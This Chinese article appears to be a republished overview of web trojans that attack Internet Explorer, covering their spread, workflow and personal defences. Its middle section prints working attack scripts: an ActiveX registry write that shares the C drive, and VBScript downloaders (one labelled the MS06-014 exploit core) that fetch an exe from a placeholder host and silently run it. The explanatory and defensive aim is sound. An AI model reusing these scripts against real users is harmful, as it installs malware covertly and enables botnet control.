一、總論

網頁木馬一直是國內網絡流行的東西。（金州注釋，據朋友說，這種東西在國外并不流行。）之所以比較流行金州覺得有如下原因：

1.網頁木馬在各種網絡威脅中技術含量相對來說屬于較低的類型。這就意味著他便于制作推廣。

2.免費空間的增多和個人建站的流行，給網頁木馬客觀附帶的造就了很大的生存空間。

3.國內上網人數的奇跡般的遞增，使網頁木馬的受眾層增多。

4.國內上網人群目前普遍安全意識較低，很多人使用盜版系統，有時候無法更新補丁或及時更新補丁，（金州注釋，國內網頁木馬大多是針對windows系統的ie的）使針對ie漏洞型的網頁木馬生存時間延長。

5.網頁木馬見效快，（金州注釋，這個并不是證明網頁木馬效率高，而是因為受眾多）

6.很多間接推動網絡安全，擅長腳本技術的人很及時地推出了眾多簡便式的網頁木馬生成器或網頁木馬程式。此中icefox(冰狐浪子EST)，LCX(haiyangtop.126.com)等對于國內網頁木馬的流行起到了奠基的作用。

以上jinzhou只是淺顯說到網頁木馬之所以流行的原因。其中也可看到網頁木馬目前來說還是具有一定優點的，尤其是制作操作簡單。和相對收效快的特點。下面簡單說說網頁木馬的一些不足。

1.很多網頁木馬針對的是特有的ie漏洞。（金州注釋，關于詳細情形，以下論述）一旦漏洞補上，網頁木馬失效。ie的漏洞相對系統的核心漏洞來說，修補比較容易。（金州注釋，何況有些人根本就不是用ie和ie內核瀏覽器）

2.網頁木馬的絕對命中率較低，一般來說10%就很不錯了。（金州注釋，這由多種原因造成，比如受眾方做了其他限制，一些殺毒軟件或監控軟件的干擾和警示，對相關運行網頁木馬的一些控件的解除，比如更名或刪除debug和wsh等會使一些網頁木馬無法成功，一些安全監視工具會提示異常運行等等）

3.網頁木馬沒有固定目標。缺乏針對性，一定意義上，它只是等著別人來中，它不能主動地選擇受眾。

4.網頁木馬很難感染一些重要部門的重要機器而不被發現。網頁木馬常常無力顧及木馬被下載后的深入隱藏。很容易被一些有基礎安全知識的人查獲。

5.因為網頁木馬一旦應用，即等于間接性的公開了腳本，具有時效性。幾乎不可能有永遠好使的網頁木馬，（金州注釋，指的是網頁木馬的流程），而一些rootkit甚至能隱藏10年。網頁木馬類流行很少過年。

目前網頁木馬的主要危害，金州覺得主要是利用網頁木馬控制大量機器，間接形成僵尸網絡進行利用tcp/ip協議漏洞的DOS/DDOS攻擊。和一些其他的商業非法活動，例如投票，發布商業廣告，作為跳板的一些滲透等。很多時候能造成極大的危害。也就是說網頁木馬的利用趨勢已經由開始的惡作劇性的對某些機器的窺視變成了利用受眾機器形成一種力量轉做為攻擊和謀求商業利益的武器。

二、網頁木馬的基本工作流程

網頁木馬的基本工作流程，大致是，

1.受眾打開含有網頁木馬代碼的網頁；

2.網頁木馬利用ie漏洞或者一些腳本功能下載一個可執行文件或腳本。（金州注釋，很多時候根據需要附帶同時紀錄用戶ip）

如以下代碼

<script language="javascript"> 
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" 
run_exe+="CODEBASE=\"jinzhou.exe#version=1,1,1,1\">" 
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">" 
run_exe+="</OBJECT>" 
run_exe+="<HTML><H1>金州提示，網頁加載中，請稍后....正在運行木馬</H1></HTML>"; 
document.open(); 
document.clear(); 
document.writeln(run_exe); 
document.close();

保存為jinzhou.html然后在同目錄下放一個exe文件，起名為jinzhou.exe.運行jinzhou.html,會出現金州提示，網頁加載中，請稍后....正在運行木馬，然后那個jinzhou.exe就會運行。（金州注釋，本地和遠程都會提示，一般稍有一點安全意識的都不會中，不過事實上這種方法現在仍然會使很多極其不小心的人上當。此流程比較經典。）

< script language=javascript> 
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); 
function f(){ 
a1=document.applets[0]; 
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
a1.createInstance(); 
Shl = a1.GetObject(); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\
Flags",402,"REG_DWORD"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\
Type",0,"REG_DWORD" 
); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\
Path","C:\\"); 
} 
function init() 
{ 
setTimeout("f()", 1000); 
} 
init();

調用本地控件寫注冊表的代碼。此代碼是共享c，當然你可以共享任何盤。

<script language="vbscript"> 

const adTypeBinary = 1 
const adSaveCreateOverwrite = 2 
const adModeReadWrite = 3 

set xmlHTTP = CreateObject("Microsoft.XMLHTTP") 
xmlHTTP.open "GET","http://www.xxx.com/jinzhou.EXE", false 
xmlHTTP.send 
contents = xmlHTTP.responseBody 

Set oStr = CreateObject("ADODB.Stream") 
oStr.Mode = adModeReadWrite 
oStr.Type = adTypeBinary 
oStr.Open 

oStr.Write(contents) 
oStr.SaveToFile "c:\\jinzhou.exe", adSaveCreateOverwrite 

</script>

上面以前的Adodb.Stream文件下載代碼核心部分。

<script language="VBScript">
on error resume next
dl = "http://www.xxx.com/jinzhou.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) 
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>

以上MS06014利用代碼核心。

綜合以上，大致可以看出，網頁木馬的基礎就是非法讓受眾在不知覺得情況下改變用戶配置或下載運行非法程序以非法謀取自己的非法利益。不在一一舉例。在網頁木馬的歷史上影響重大的還有MHT漏洞即Windows在處理畸形MHTML，能執行任意遠程腳本代碼。（金州注釋，國內一般稱為chm木馬。冰狐浪子對此有很詳細的文章。）木馬有2個組成部分，一個是利用MHT漏洞的惡意網頁代碼，另一個是包含惡意程序的CHM文件。把它們都放到網站上，用戶訪問惡意網頁時，會在沒有任何安全提示的情況下，自動下載遠程CHM文件中的程序并運行。HHCTRL漏洞，HTML幫助ActiveX控件存在問題，利用它可以進行跨安全區域腳本執行，從而可以下載并自動執行遠程惡意程序。HTA漏洞，IE瀏覽器允許HTA類型的代碼以全部權限運行。遠程HTA代碼可以調用Wscript.Shell等控件執行用戶本地的任意程序，iframe溢出等等。網上相關資料較多。不再贅述。總體來說，網頁木馬的制作并不復雜，它的重點往往會在加密和輔助的隱藏上。

三、網頁木馬的基本防范

網頁木馬的基本防范大概如下幾點，（金州注釋，針對個人的，網頁木馬絕大多數受眾都是個人。）

1.卸載或者改名whs腳本宿主。刪除注冊表｛F935DC22-1CF0-11D0-ADB9-00C04FD58A0B｝

{0D43FE01-F093-11CF-8940-00A0C9054228}，運行regsvr32 scrrun.dll /u 卸載控件等。

2.在我的電腦，屬性，高級，環境變量中，PATHEXT刪除一些危險的變量，如vbs,vbe,js等。或在文件夾選項，文件類型中更改vbs，Windows Script Host等的關聯。

3.禁用ftp，tftp,或改變端口。等防止網頁木馬的利用途徑。找到C:\windows\system32\drivers\Etc 記事本打開其中的services文件會看到一些對應的端口，改一下保存就行了。改名debug等。

4.最好安裝殺毒軟件。打開實時監控，一般網頁木馬殺毒還是會報警的。

5.提高警惕性，一旦發現ie運行不正常，比如卡或者無故死掉，或者一場閃出，養成立刻檢查系統的習慣。

6.多注意查看網頁源代碼，無論多么高明的網頁木馬，在源代碼中也可以看出端倪。

7.注意更新系統補丁。

等等。

（金州注釋，以上為個人見解，技術日新月異，不一定有效全面，個人愚笨，在學習中，不足之處見諒。另，文中一些代碼可能會被殺毒報警，無害。）

責任編輯 趙毅 zhaoyi#51cto.com TEL:（010）68476636-8001